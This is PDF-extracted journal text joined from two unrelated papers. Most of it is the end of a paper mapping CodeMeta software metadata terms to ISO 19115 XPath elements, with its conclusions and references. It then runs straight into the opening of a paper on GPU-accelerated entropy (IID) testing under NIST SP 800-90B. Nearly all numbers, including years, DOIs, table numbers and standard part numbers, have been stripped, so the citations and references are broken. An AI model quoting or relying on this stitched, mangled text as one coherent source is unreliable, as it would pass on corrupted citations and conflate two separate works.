identificationinfo.citation.citedresponsibleparty [not(role=’author’ or role =’principalinvestigator’ or role =’originator’)].party.namea /mdb:md_metadata/mdb:identificationinfo/*/mri:citation/ cit:ci_citation/cit:citedresponsibleparty/cit:ci_responsibility[not (cit:role/cit:ci_rolecode=’author’ or cit:role/cit:ci_rolecode =’principalinvestigator’ or cit:role/cit:ci_rolecode =’originator’)]/cit:party/*/cit:name copyright holder organization or person the party holding the legal copyright to the creativework. identificationinfo.resourceconstraints.reference. citedresponsibleparty /mdb:md_metadata/mdb:identificationinfo/*/mri:resourceconstraints/ mco:md_legalconstraints/mco:reference/cit:ci_citation/ cit:citedresponsibleparty/cit:ci_responsibility copyright year number the year during which the claimed copy- right for the creativework was first as- serted. identificationinfo.resourceconstraints.reference. date[datetype=’publication’].date /mdb:md_metadata/mdb:identificationinfo/*/mri:resourceconstraints/ mco:md_legalconstraints/mco:reference/cit:ci_citation/ cit:date/cit:ci_date[cit:datetype/cit:ci_datetypecode =’publication’]/cit:datetype creator organization or person the creator/author of this creativework. this is the same as the author property for creativework. identificationinfo.citation.citedresponsibleparty [role=’author’].party.name or identifica- tioninfo.citation.citedresponsibleparty[role =’originator’].party.namea /mdb:md_metadata/mdb:identificationinfo/*/mri:citation/cit:ci_citation/ cit:citedresponsibleparty/cit:ci_responsibility[cit:role/cit:ci_rolecode =’author’] or /mdb:md_metadata/mdb:identificationinfo/*/mri:citation/cit:ci_citation/ cit:citedresponsibleparty/cit:ci_responsibility[cit:role/cit:ci_rolecode =’originator’] date created date or date- time the date on which the creativework was created or the item was added to a datafeed. identificationinfo.citation.date[datetype =’creation’]. datea /mdb:md_metadata/mdb:identificationinfo/*/mri:citation/ cit:ci_citation/cit:date/cit:ci_date[cit:datetype/cit:ci_datetypecode =’creation’]/cit:date/gco:datetime date modified date or date- time the date on which the creativework was most recently modified or when the item’s entry was modified within a datafeed. identificationinfo.citation.date[datetype =’revision’]. datea /mdb:md_metadata/mdb:identificationinfo/*/mri:citation/cit:ci_citation/ cit:date/cit:ci_date[cit:datetype/cit:ci_datetypecode =’revision’]/cit:date/gco:datetime date published date date of first broadcast/publication. identificationinfo.citation.date[datetype =’publication’].datea /mdb:md_metadata/mdb:identificationinfo/*/mri:citation/cit:ci_citation/ cit:date/cit:ci_date[cit:datetype/cit:ci_datetypecode =’publication’]/cit:date/gco:date editor person specifies the person who edited the cre- ativework. identificationinfo.citation.citedresponsibleparty [role=’editor’].party.namea /mdb:md_metadata/mdb:identificationinfo/*/mri:citation/cit:ci_citation/ cit:citedresponsibleparty/ cit:ci_responsibility[cit:role/cit:ci_rolecode =’editor’] (continued on next page) h aberm ann ( ),p eerj c om put.s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table (continued) property type description iso - iso - encoding mediaobject a media object that encodes this creative- work. this property is a synonym for as- sociatedmedia. supersedes encodings. fileformat text or url media type, typically mime format (see iana site) of the content e.g., applica- tion/zip of a softwareapplication binary. 
in cases where a creativework has several media type representations, ’encoding’ can be used to indicate each mediaobject alongside particular fileformat informa- tion. unregistered or niche file formats can be indicated instead via the most ap- propriate url, e.g., defining web page or a wikipedia entry. identificationinfo.resourceformat. formatspecifi- cationcitation /mdb:md_metadata/mdb:identificationinfo/mri:md_dataidentification/ mri:resourceformat/mrd:md_format/mrd:formatspecificationcitation/ cit:ci_citation funder organization or person a person or organization that supports (sponsors) something through some kind of financial contribution. identificationinfo.citation.citedresponsibleparty [role=’funder’].party.namea /mdb:md_metadata/mdb:identificationinfo/*/mri:citation/cit:ci_citation/ cit:citedresponsibleparty/cit:ci_responsibility[cit:role/cit:ci_rolecode =’funder’] haspart creativework indicates a creativework that is (in some sense) a part of this creativework. re- verse property ispartof identificationinfo.associatedresource [associa- tiontype=’iscomposedof’].namea /mdb:md_metadata/mdb:identificationinfo/*/mri:associatedresource/ mri:md_associatedresource[mri:associationtype/mri:ds_associationtypecode =’iscomposedof’]/mri:name/cit:ci_citation isaccessibleforfree boolean a flag to signal that the publication is ac- cessible for free. distributioninfo.distributionformat.format distributor.distributionorderprocess.fees /mdb:md_metadata/mdb:distributioninfo/mrd:md_distribution/ mrd:distributionformat/mrd:md_format/mrd:formatdistributor/ mrd:md_distributor/mrd:distributionorderprocess/ mrd:md_standardorderprocess/mrd:fees ispartof creativework indicates a creativework that this cre- ativework is (in some sense) part of. re- verse property haspart identificationinfo.associatedresource [associa- tiontype=’largerworkcitation’].namea /mdb:md_metadata/mdb:identificationinfo/*/mri:associatedresource/ mri:md_associatedresource[mri:associationtype/mri:ds_associationtypecode =’largerworkcitation’]/mri:name/cit:ci_citation keywords text keywords or tags used to describe this content. multiple entries in a keywords list are typically delimited by commas. identificationinfo.descriptivekeywords[type =’theme’]. keyworda /mdb:md_metadata/mdb:identificationinfo/*/mri:descriptivekeywords/ mri:md_keywords[mri:type/mri:md_keywordtypecode =’theme’]/mri:keyword/gco:characterstring license creativework or url a license document that applies to this content, typically indicated by url. identificationinfo.resourceconstraints.reference /mdb:md_metadata/mdb:identificationinfo/mri:md_dataidentification/ mri:resourceconstraints/mco:md_legalconstraints/mco:reference/cit:ci_citation position integer or text the position of an item in a series or se- quence of items. (while schema.org con- siders this a property of creativework, it is also the way to indicate ordering in any list (e.g., the authors list). by default ar- rays are unordered in json-ld producer organization or person the person or organization who produced the work (e.g., music album, movie, tv/ra- dio series etc.). identificationinfo.citation.citedresponsibleparty [role=’creator’].party.namea /mdb:md_metadata/mdb:identificationinfo/*/mri:citation/cit:ci_citation/ cit:citedresponsibleparty/cit:ci_responsibility[cit:role/cit:ci_rolecode =’creator’]/cit:party/a provider organization or person the service provider, service operator, or service performer; the goods pro- ducer. 
another party (a seller) may offer those services or goods on behalf of the provider. a provider may also serve as the seller. supersedes carrier. identificationinfo.pointofcontact [role =’pointofcontact’].party.namea /mdb:md_metadata/mdb:identificationinfo/srv:sv_serviceidentification/ mri:pointofcontact/cit:ci_responsibility[cit:role/cit:ci_rolecode =’provider’]/cit:party/* (continued on next page) h aberm ann ( ),p eerj c om put.s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table (continued) property type description iso - iso - publisher organization or person the publisher of the creative work. identificationinfo.citation.citedresponsibleparty [role=’publisher’].party.namea /mdb:md_metadata/mdb:identificationinfo/*/mri:citation/cit:ci_citation/ cit:citedresponsibleparty/cit:ci_responsibility[cit:role/cit:ci_rolecode =’publisher’]/cit:party/a sponsor organization or person a person or organization that supports a thing through a pledge, promise, or fi- nancial contribution. e.g., a sponsor of a medical study or a corporate sponsor of an event. identificationinfo.citation.citedresponsibleparty [role=’sponsor’].party.namea /mdb:md_metadata/mdb:identificationinfo/*/mri:citation/cit:ci_citation/ cit:citedresponsibleparty/cit:ci_responsibility[cit:role/cit:ci_rolecode =’sponsor’]/cit:party/a version number or text the version of the creativework embod- ied by a specified resource. identificationinfo.citation.edition /mdb:md_metadata/mdb:identificationinfo/mri:md_dataidentification/mri:citation/ cit:ci_citation/cit:edition/gco:characterstring notes. amultiple codemeta terms are mapped to this iso xml element, some with different attributes. h aberm ann ( ),p eerj c om put.s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table mapping of codemeta terms from the thing.creativework.softwaresourcecode schema to iso - and iso - . property type description iso - iso - code repository url link to the repository where the un- compiled, human readable code and re- lated code is located (svn, github, code- plex). distributioninfo.distributor.distributor transferoptions.online[function =’download’].linkage or distribution- info.distributor.distributortransferoptions. 
online[function=’information’].linkage or distributioninfo.transferoptions.online [function=’download’].linkage or distributioninfo.transferoptions.online [function=’information’].linkage or identificationinfo.citation.onlineresource [function=’download’].linkage or identificationinfo.citation.onlineresource [function=’information’].linkage* /mdb:md_metadata/mdb:distributioninfo/mrd:md_distribution/ mrd:distributor/mrd:mddistributor/mrd:distributortransferoptions/ mrd:mddigitaltransferoptions/mrd:online/cit:ci_onlineresource[cit: function/cit:ci_onlinefunctioncode =’information’]/ cit:linkage/gco:characterstring or /mdb:md_metadata/ mdb:distributioninfo/mrd:md_distribution/mrd:transferoptions/ mrd:mddigitaltransferoptions/mrd:online/cit:ci_onlineresource [cit:function/cit:ci_onlinefunctioncode =’information’]/ cit:linkage/gco:characterstring or /mdb:md_metadata/ mdb:identificationinfo/*/mri:citation/cit:ci_citation/ cit:onlineresource/cit:ci_onlineresource[cit:function/ cit:ci_onlinefunctioncode =’information’] /cit:linkage/ gco:characterstring or /mdb:md_metadata/mdb:distributioninfo/ mrd:md_distribution/mrd:distributor/mrd:mddistributor/ mrd:distributortransferoptions/mrd:mddigitaltransferoptions/ mrd:online/cit:ci_onlineresource[cit:function/ cit:ci_onlinefunctioncode =’download’] /cit:linkage/ gco:characterstring or /mdb:md_metadata/mdb:distributioninfo/ mrd:md_distribution/mrd:transferoptions/mrd:mddigitaltransferoptions/ mrd:online/cit:ci_onlineresource[cit:function/ cit:ci_onlinefunctioncode =’download’] /cit:linkage/ gco:characterstring or /mdb:md_metadata/mdb:identificationinfo/*/ mri:citation/cit:ci_citation/cit:onlineresource/ cit:ci_onlineresource[cit:function/ cit:ci_onlinefunctioncode =’download’] /cit:linkage/gco:characterstring programminglanguage computer lan- guage or text the computer programming language. identificationinfo.descriptivekeywords[type =’theme’]. keyworda /mdb:md_metadata/mdb:identificationinfo/*/mri:descriptivekeywords/ mri:md_keywords[mri:type/mri:md_keywordtypecode =’theme’]/mri:keyword/gco:characterstring runtime platform text runtime platform or script interpreter dependencies (example—java v , python . , .net framework . ). supersedes runtime. identificationinfo.environmentdescriptiona /mdb:md_metadata/mdb:identificationinfo/mri:md_dataidentification/ mri:environmentdescription/gco:characterstring target product software appli- cation target operating system/product to which the code applies. if applies to sev- eral versions, just the product name can be used. identificationinfo.associatedresource.namea /mdb:md_metadata/mdb:identificationinfo/*/mri:associatedresource/ mri:md_associatedresource/mri:name/cit:ci_citation notes. amultiple codemeta terms are mapped to this iso xml element, some with different attributes. h aberm ann ( ),p eerj c om put.s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table mapping of codemeta terms from the codemeta.softwaresourcecode schema to iso - and iso - . property type description iso - iso - build instructions url link to installation instructions/documen- tation identificationinfo.additionaldocumentationa /mdb:md_metadata/mdb:identificationinfo/*/ mri:additionaldocumentation/cit:ci_citation cont integration url link to continuous integration service identificationinfo.additionaldocumentationa /mdb:md_metadata/mdb:identificationinfo/*/ mri:additionaldocumentation/cit:ci_citation developmentstatus text description of development status, e.g., active, inactive, supsended. 
see reposta- tus.org identificationinfo.status /mdb:md_metadata/mdb:identificationinfo/*/ mri:status/mcc:md_progresscode embargo date date software may be embargoed from public access until a specified date (e.g., pending publication, year from publication) identificationinfo.citation.date[datetype =’released’]. datea /mdb:md_metadata/mdb:identificationinfo/*/mri:citation/ cit:ci_citation/cit:date/cit:ci_date[cit:datetype/ cit:ci_datetypecode =’released’]/cit:date/gco:datetime funding text funding source (e.g., specific grant) identificationinfo.associatedresourcea /mdb:md_metadata/mdb:identificationinfo/*/ mri: associatedresource/mri:md_associatedresource/mri:name/cit:ci_citation issuetracker url link to software bug reporting or issue tracking system identificationinfo.resourcespecificusage. identifiedissues.onlineresource.linkage /mdb:md_metadata/mdb:identificationinfo/*/mri: resourcespecificusage/mri:md_usage/mri:identifiedissues/cit:ci_citation maintainer person individual responsible for maintaining the software (usually includes an email con- tact address) identificationinfo.pointofcontact /mdb:md_metadata/mdb:identificationinfo/*/mri:pointofcontact readme url link to software readme file identificationinfo.additionaldocumentationa /mdb:md_metadata/mdb:identificationinfo/*/ mri:additionaldocumentation/cit:ci_citation reference publication scholarlyarticle an academic publication related to the software. identificationinfo.additionaldocumentationa /mdb:md_metadata/mdb:identificationinfo/*/ mri:additionaldocumentation/cit:ci_citation software suggestions softwaresourcecode optional dependencies, e.g., for optional features, code development, etc identificationinfo.additionaldocumentationa /mdb:md_metadata/mdb:identificationinfo/*/ mri:additionaldocumentation/cit:ci_citation notes. amultiple codemeta terms are mapped to this iso xml element, some with different attributes. h aberm ann ( ),p eerj c om put.s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. schema:thing.creativework.softwareapplication the thing.creativework.softwareapplication schema provides a vocabulary for describing a software application. this mapping includes fifteen items listed in table . conclusions the iso metadata standards were originally developed by iso technical committee to serve as the standard and structured part of the documentation needed to discover, access, use, and understand datasets. the standards acknowledge that they are generic, and they include several mechanisms for extension to address specific needs of communities that build on the standards. the generic nature of these standards is reflected in the breadth of the codelist that can be used to describe the scope of a particular metadata record (see list in model characteristics section above and habermann, a; habermann, b; habermann, c). the codemeta project recently proposed over sixty terms that can be used in metadata for software. this recommendation provides a framework that provides insight into what iso metadata for software might contain. the iso metadata standards include several elements that directly cite software, e.g., the processinginformation.softwarereference or algorithm.citation elements, and the primary purpose of the mappings proposed here is to support iso users that want to ( ) express software metadata in a dialect that they are familiar with and ( ) to facilitate translation of software metadata written using iso standards to codemeta-compliant json-ld. 
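For illustration, the short sketch below applies two of the mappings from the tables above (the CodeMeta name term taken from the ISO citation title, and version taken from the citation edition) to emit a minimal CodeMeta-style fragment. It is only a sketch under stated assumptions: the property paths are copied from the mapping tables, but the program itself, the hard-coded example values, and the output layout are illustrative and are not part of either standard or of any existing tool.

```cpp
#include <iostream>
#include <map>
#include <string>

int main() {
    // CodeMeta term -> ISO 19115-1 path, copied from two rows of the mapping tables above.
    std::map<std::string, std::string> iso_path = {
        {"name",    "identificationInfo.citation.title"},
        {"version", "identificationInfo.citation.edition"}
    };
    // Stand-in values, as if they had been read from an ISO metadata record at those paths.
    std::map<std::string, std::string> iso_value = {
        {"identificationInfo.citation.title",   "Example Analysis Tool"},
        {"identificationInfo.citation.edition", "2.1.0"}
    };

    // Emit a minimal CodeMeta-style JSON fragment (the @context line is omitted here).
    std::cout << "{\n"
              << "  \"name\": \""    << iso_value[iso_path["name"]]    << "\",\n"
              << "  \"version\": \"" << iso_value[iso_path["version"]] << "\"\n"
              << "}\n";
    return 0;
}
```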
note that the purpose is different than the primary purpose of the crosswalks proposed on the codemeta project site which is to facilitate automated translations between different json-ld vocabularies and rdf. adding an iso crosswalk to the codemeta framework was the original goal of this work, but the differences identified and described here are significant enough to make that impossible. this translation may be facilitated with an xslt built specifically for that purpose, like the one created by peroni, lapeyre & shotton, , but that is beyond the scope of this initial comparison. the process of creating a mapping between these two representations surfaced some differences that complicate the mapping. some of these differences are related to hard and soft typing used in the two models and others are related to increased flexibility that is required in a generic standard like iso for documenting citations, distribution channels, and related resources. the differences in approach described here probably apply to many mappings from xml to rdf representations. peroni, lapeyre & shotton, identified and discussed some similar challenges when mapping between jats xml and spar ontologies. they attributed these differences to ‘‘differing philosophical viewpoints for xml and rdf’’, then described two reasons that xml element names are ambiguous when used in isolation: attributes and hierarchical structure. they suggest that the jats standard (and by implication all xml representations) is ‘‘deliberately vague’’ and that the hierarchical structure of xml is ‘‘not formalized and implicitly lives outside the xml schema of the language’’. it is certainly true that xml element names can be ambiguous without habermann ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table mapping of codemeta terms from the schema:thing.creativework.softwareapplication schema to iso - and - . property type description iso - iso - application category text or url type of software application, e.g., ’game, multimedia’. identificationinfo.descriptivekeywords[type =’theme’].keyword* /mdb:md_metadata/mdb:identificationinfo/*/mri:descriptivekeywords/ mri:md_keywords[mri:type/mri:md_keywordtypecode =’theme’]/ mri:keyword/gco:characterstring application subcategory text or url subcategory of the application, e.g., ‘arcade game’. identificationinfo.descriptivekeywords[type =’theme’].keyword* /mdb:md_metadata/mdb:identificationinfo/*/mri:descriptivekeywords/ mri:md_keywords[mri:type/mri:md_keywordtypecode =’theme’]/mri:keyword/ gco:characterstring download url url if the file can be downloaded, url to download the binary. 
distributioninfo.distributor.distributor transferoptions.online[function =’download’].linkage or distributioninfo.transfer options.online[function =’download’].linkage or identification- info.citation.onlineresource[function =’download’].linkage /mdb:md_metadata/mdb:distributioninfo/mrd:md_distribution/ mrd:distributor/mrd:md_distributor/mrd:distributortransferoptions/ mrd:md_digitaltransferoptions/mrd:online/cit:ci_onlineresource [cit:function/cit:ci_onlinefunctioncode =’download’]/ cit:linkage/gco:characterstring or /mdb:md_metadata/ mdb:distributioninfo/mrd:md_distribution/mrd:transferoptions/ mrd:md_digitaltransferoptions/mrd:online/cit:ci_onlineresource [cit:function/cit:ci_onlinefunctioncode =’download’] / cit:linkage/gco:characterstring or /mdb:md_metadata/ mdb:identificationinfo/*/mri:citation/cit:ci_citation/ cit:onlineresource/cit:ci_onlineresource[cit:function/ cit:ci_onlinefunctioncode =’download’] /cit:linkage/gco:characterstring filesize text size of the application/package (e.g., mb). in the absence of a unit (mb, kb etc.), kb will be as- sumed. distributioninfo.transferoptions.transfersize or distribution- info.distributionformat.formatdistributor. distributortransferoptions.transfersize or distribution- info.distributor.distributortransferoptions .transfersize /mdb:md_metadata/mdb:distributioninfo/mrd:md_distribution/ mrd:transferoptions/mrd:md_digitaltransferoptions/mrd:transfersize/ gco:real or /mdb:md_metadata/mdb:distributioninfo/mrd:md_distribution/ mrd:distributionformat/mrd:md_format/mrd:formatdistributor/ mrd:md_distributor/mrd:distributortransferoptions/ mrd:md_digitaltransferoptions/mrd:transfersize/gco:real or / mdb:md_metadata/mdb:distributioninfo/mrd:md_distribution/ mrd:distributor/mrd:md_distributor/mrd:distributortransferoptions/ mrd:md_digitaltransferoptions/mrd:transfersize/gco:real installurl url url at which the app may be in- stalled, if different from the url of the item. distributioninfo.distributor.distributor transferoptions.online[function=’download’]. linkage or distribution- info.transferoptions.online [function=’download’].linkage or identificationinfo. citation.onlineresource[function =’download’].linkage /mdb:md_metadata/mdb:distributioninfo/mrd:md_distribution/ mrd:distributor/mrd:md_distributor/mrd:distributortransferoptions/ mrd:md_digitaltransferoptions/mrd:online/cit:ci_onlineresource [cit:function/cit:ci_onlinefunctioncode =’download’]/ cit:linkage/gco:characterstring or /mdb:md_metadata/ mdb:distributioninfo/mrd:md_distribution/mrd:transferoptions/ mrd:md_digitaltransferoptions/mrd:online/cit:ci_onlineresource [cit:function/cit:ci_onlinefunctioncode =’download’]/ cit:linkage/gco:characterstring or /mdb:md_metadata/ mdb:identificationinfo/*/mri:citation/cit:ci_citation/ cit:onlineresource/cit:ci_onlineresource[cit:function/ cit:ci_onlinefunctioncode =’download’]/cit:linkage/gco:characterstring (continued on next page) h aberm ann ( ),p eerj c om put.s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table (continued) property type description iso - iso - memory requirements text or url minimum memory requirements. identificationinfo.environmentdescriptiona /mdb:md_metadata/mdb:identificationinfo/mri: md_dataidentification/mri:environmentdescription/gco:characterstring operating system text operating systems supported (windows , osx . , android . ). 
identificationinfo.environmentdescriptiona /mdb:md_metadata/mdb:identificationinfo/mri: md_dataidentification/mri:environmentdescription/gco:characterstring permissions text permission(s) required to run the app (for example, a mobile app may require full internet access or may run only on wifi). identificationinfo.resourceconstraints or iden- tificationinfo.resourceconstraints.reference. onlineresource.linkage /mdb:md_metadata/mdb:identificationinfo/*/mri:resourceconstraints/ mco:md_legalconstraints or /mdb:md_metadata/mdb:identificationinfo/ mri:md_dataidentification/mri:resourceconstraints/ mco:md_legalconstraints/mco:reference/cit:ci_citation/ cit:onlineresource/cit:ci_onlineresource/cit:linkage processor requirements text processor architecture required to run the application (e.g., ia ). identificationinfo.environmentdescriptiona /mdb:md_metadata/mdb:identificationinfo/mri: md_dataidentification/mri:environmentdescription/gco:characterstring release notes text or url description of what changed in this version. identificationinfo.additionaldocumentationa /mdb:md_metadata/mdb:identificationinfo/*/mri:additionaldocumentation/ cit:ci_citation software help creativework software application help. identificationinfo.additionaldocumentationa /mdb:md_metadata/mdb:identificationinfo/*/mri:additionaldocumentation/ cit:ci_citation software requirements softwaresourcecode required software dependencies identificationinfo.additionaldocumentationa /mdb:md_metadata/mdb:identificationinfo/*/mri:additionaldocumentation/ cit:ci_citation software version text version of the software instance. identificationinfo.citation.edition /mdb:md_metadata/mdb:identificationinfo/mri:md_dataidentification/ mri:citation/cit:ci_citation/cit:edition storage requirements text or url storage requirements (free space required). identificationinfo.environmentdescriptiona /mdb:md_metadata/mdb:identificationinfo/mri:md_dataidentification/ mri:environmentdescription/gco:characterstring supporting data datafeed supporting data for a software ap- plication. identificationinfo.associatedresource.namea /mdb:md_metadata/mdb:identificationinfo/*/mri:associatedresource/ mri:md_associatedresource/mri:name/cit:ci_citation notes. amultiple codemeta terms are mapped to this iso xml element, some with different attributes. h aberm ann ( ),p eerj c om put.s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. associated attributes and hierarchical structure but ignoring those methods of providing meaning in xml and then stating that elements alone are ambiguous does not contribute to understanding differences between how these two approaches describe resources. i examine these differences in more detail and offer an explanation that is related to different approaches to defining types: xml can use attributes and structure to provide information about types and meaning while rdf must rely on unambiguous and shared definitions of terms. to use the case described in peroni, lapeyre & shotton, , the jats element ‘‘article’’ is definitely ambiguous. that is why the definition of the element includes an attribute called article-type to clarify the type of the article being described. details of the importance of attributes for semantics in xml is described in detail by seligy ( ) along with potential problems that result from ignoring attribute values. peroni, lapeyre & shotton ( ) also acknowledge the requirement for unambiguous definitions that are shared across communities. 
They state that ‘‘a cornerstone of the Semantic Web is the use of open published ontologies to give precise and universally available definitions to terms, so that RDF statements, whatever else they are, are unambiguous in their meaning.’’ While this may be a goal of ontology development efforts, many of the definitions currently used in CodeMeta and schema.org (shown in the mapping tables above) are unclear, non-unique, and ambiguous.

ISO mappings are proposed for sixty-four of the sixty-eight CodeMeta terms. These mappings can be used to create CodeMeta-compliant metadata from existing stores of ISO metadata and to add CodeMeta-compliant software citations in the future. This compares with a considerably smaller average number of mappings for the other dialects included in the CodeMeta crosswalk. The disparity reflects the use cases targeted by the dialects: many of the dialects that have been mapped to CodeMeta focus on citation or dependency identification and management, while ISO and CodeMeta share additional targets that include access, use, and understanding.

Acknowledgements
Thanks to Matt Jones, Carl Boettiger, Dennis Walworth, and Melissa Harrison for helpful comments and discussion of the initial draft of this paper.

Additional Information and Declarations

Funding
All of this material is based upon work supported by the National Science Foundation under Grant No. NSFDACS C and by NASA/GSFC under Raytheon Co. contract number NNG HZ C. There was no additional external funding received for this study. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript.

Grant Disclosures
The following grant information was disclosed by the author:
National Science Foundation: NSFDACS C.
NASA/GSFC: NNG HZ C.

Competing Interests
Ted Habermann is the Director of Earth Science at The HDF Group. The author declares that there are no competing interests.

Author Contributions
• Ted Habermann conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft.

Data Availability
The following information was supplied regarding data availability:
Habermann, Ted: mappingtables_iso - tocodemeta.csv. figshare. Dataset. https://doi.org/ . /m .figshare. .v .

Supplemental Information
Supplemental information for this article can be found online at http://dx.doi.org/ . /peerj-cs. #supplemental-information.

References
CodeMeta Crosswalk. Available at https://codemeta.github.io/crosswalk/ (accessed on August).
CodeMeta Project. Available at https://codemeta.github.io (accessed on October).
Crosswalk data. codemeta/crosswalk.csv. Available at https://github.com/codemeta/codemeta/blob/ db f c b b cc e bdaa ce/crosswalk.csv (accessed on August).
DataCite Metadata Working Group. DataCite metadata schema documentation for the publication and citation of research data. DataCite e.V. DOI . / .
Gordon S, Habermann T. The influence of community recommendations on metadata completeness. Ecological Informatics: – DOI . /j.ecoinf. . . .
Habermann T (a). Metadata life cycles, use cases and hierarchies. Geosciences ( ): DOI . /geosciences .
Habermann T (b). mappingtables_iso - tocodemeta.csv. figshare. Dataset DOI . /m .figshare. .v .
Habermann T (c). CodeMeta mapping to ISO. Available at https://github.
com/codemeta/codemeta/blob/master/crosswalks/iso_ - .csv (accessed on january ). habermann ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /m .figshare. .v http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information https://codemeta.github.io/crosswalk/ https://codemeta.github.io https://github.com/codemeta/codemeta/blob/ db f c b b cc e bdaa ce/crosswalk.csv https://github.com/codemeta/codemeta/blob/ db f c b b cc e bdaa ce/crosswalk.csv https://github.com/codemeta/codemeta/blob/ db f c b b cc e bdaa ce/crosswalk.csv http://dx.doi.org/ . / http://dx.doi.org/ . /j.ecoinf. . . http://dx.doi.org/ . /geosciences http://dx.doi.org/ . /m .figshare. .v https://github.com/codemeta/codemeta/blob/master/crosswalks/iso_ - .csv https://github.com/codemeta/codemeta/blob/master/crosswalks/iso_ - .csv http://dx.doi.org/ . /peerj-cs. international organization for standardization (iso) - , geographic information—metadata—part : fundamentals. . available at https://www. iso.org/standard/ .html. (accessed on october ). international organization for standardization (iso) - , geographic information—metadata—part : xml schema implementation for fundamental concepts. . available at https://www.iso.org/standard/ .html. (accessed on october ). iso conceptual model. . iso conceptual model—html view. available at https://www.isotc .org/hmmg/html/conceptualmodels/ (accessed on october ). peroni s, lapeyre da, shotton d. . from markup to linked data: mapping niso jats v . to rdf using the spar (semantic publishing and referencing) ontologies. in: journal article tag suite conference (jats-con) proceedings . bethesda: national center for biotechnology information. available at https://www.ncbi.nlm. nih.gov/books/nbk / (accessed on october ). resource description framework (rdf). . available at https://en.wikipedia.org/ wiki/resource_description_framework (accessed on december ). seligy m. . listen up! is it time for systems to start hearing what attributes are saying? in: journal article tag suite conference (jats-con) proceedings . bethesda: national center for biotechnology information. available at https://www. ncbi.nlm.nih.gov/books/nbk / (accessed on october ). smith am, katz ds, niemeyer ke. . force software citation working group, software citation principles. peerj computer science :e doi . /peerj-cs. . w c. . w c rdf . . xml syntax recommendation. available at https://www.w . org/tr/rdf-syntax-grammar/#section-syntax-intro (accessed on august ). habermann ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www.iso.org/standard/ .html https://www.iso.org/standard/ .html https://www.iso.org/standard/ .html https://www.isotc .org/hmmg/html/conceptualmodels/ https://www.ncbi.nlm.nih.gov/books/nbk / https://www.ncbi.nlm.nih.gov/books/nbk / https://en.wikipedia.org/wiki/resource_description_framework https://en.wikipedia.org/wiki/resource_description_framework https://www.ncbi.nlm.nih.gov/books/nbk / https://www.ncbi.nlm.nih.gov/books/nbk / http://dx.doi.org/ . /peerj-cs. https://www.w .org/tr/rdf-syntax-grammar/#section-syntax-intro https://www.w .org/tr/rdf-syntax-grammar/#section-syntax-intro http://dx.doi.org/ . /peerj-cs. submitted june accepted january published march corresponding author yewon kim, fdt @kookmin.ac.kr academic editor gang mei additional information and declarations can be found on page doi . /peerj-cs. copyright kim and yeom distributed under creative commons cc-by . 
Accelerated implementation for testing IID assumption of NIST SP 800-90B using GPU
Yewon Kim and Yongjin Yeom
Department of Financial Information Security, Kookmin University, Seoul, South Korea
Department of Information Security, Cryptology, and Mathematics, Kookmin University, Seoul, South Korea

Abstract
In cryptosystems and cryptographic modules, insufficient entropy of the noise sources that serve as the input into the random number generator (RNG) may cause serious damage, such as compromising private keys. Therefore, it is necessary to estimate the entropy of the noise source as precisely as possible. The National Institute of Standards and Technology (NIST) published a standard document known as Special Publication (SP) 800-90B, which describes the method for estimating the entropy of the noise source that is the input into an RNG. The NIST offers two programs for running the entropy estimation process of SP 800-90B, written in Python and C++. The running time for estimating the entropy is more than one hour for each noise source. An RNG tends to use several noise sources in each supported operating system, and the noise sources are affected by the environment. Therefore, the NIST program should be run several times to analyze the security of an RNG. The NIST estimation runtimes are a burden for developers as well as for evaluators working for the Cryptographic Module Validation Program. In this study, we propose a GPU-based parallel implementation of the most time-consuming part of the entropy estimation, namely the independent and identically distributed (IID) assumption testing process. To achieve maximal GPU performance, we propose a scalable method that adjusts the optimal size of the global memory allocations depending on GPU capability and balances the workload between streaming multiprocessors. Our GPU-based implementation excludes one statistical test, which is not suitable for GPU implementation. We therefore also propose a hybrid CPU/GPU implementation that consists of our GPU-based program and the excluded statistical test running under OpenMP. The experimental results demonstrate that our method is substantially faster than the NIST package.

Subjects: Cryptography, Distributed and Parallel Computing, Security and Privacy
Keywords: Parallel processing, GPU computing, Entropy estimator, NIST SP 800-90B, Random number generator

Introduction
A random number generator (RNG) generates the random numbers required to construct cryptographic keys, nonces, salts, and sensitive security parameters used in cryptosystems and cryptographic modules. In general, an RNG produces random numbers (output) via a deterministic algorithm, depending on the noise sources (input). If its input is affected by low entropy of the noise sources, the output may be compromised. It is easy to find examples that show the importance of entropy in operating systems. Heninger et al.
describe how the RSA/DSA private keys of some TLS/SSH hosts may be obtained due to insufficient entropy of the Linux pseudo-random number generator (PRNG) during the key generation process. Ding et al. investigated the amount of entropy of the Linux PRNG running on Android at boot time. Kaplan et al. demonstrated a denial-of-service attack and a stack canary bypass based on the weaknesses of insufficient entropy at boot time on Android. Kim, Han & Lee presented a technique to recover the PreMasterSecret (PMS) of the first SSL session in Android with practical complexity, since the PMS is generated from insufficient entropy of the OpenSSL PRNG at boot time. Ristenpart & Yilek, Bernstein et al., Michaelis, Meyer & Schwenk, Schneier et al., and Yoo, Kang & Yeom describe attacks caused by weaknesses of entropy collectors or by incorrect estimations of the entropy that are either exaggerated or too conservative. Insufficient entropy of the noise source that is the input into the RNG may cause serious damage in cryptosystems and cryptographic modules. Thus, it is necessary to estimate the entropy of the noise source as precisely as possible.

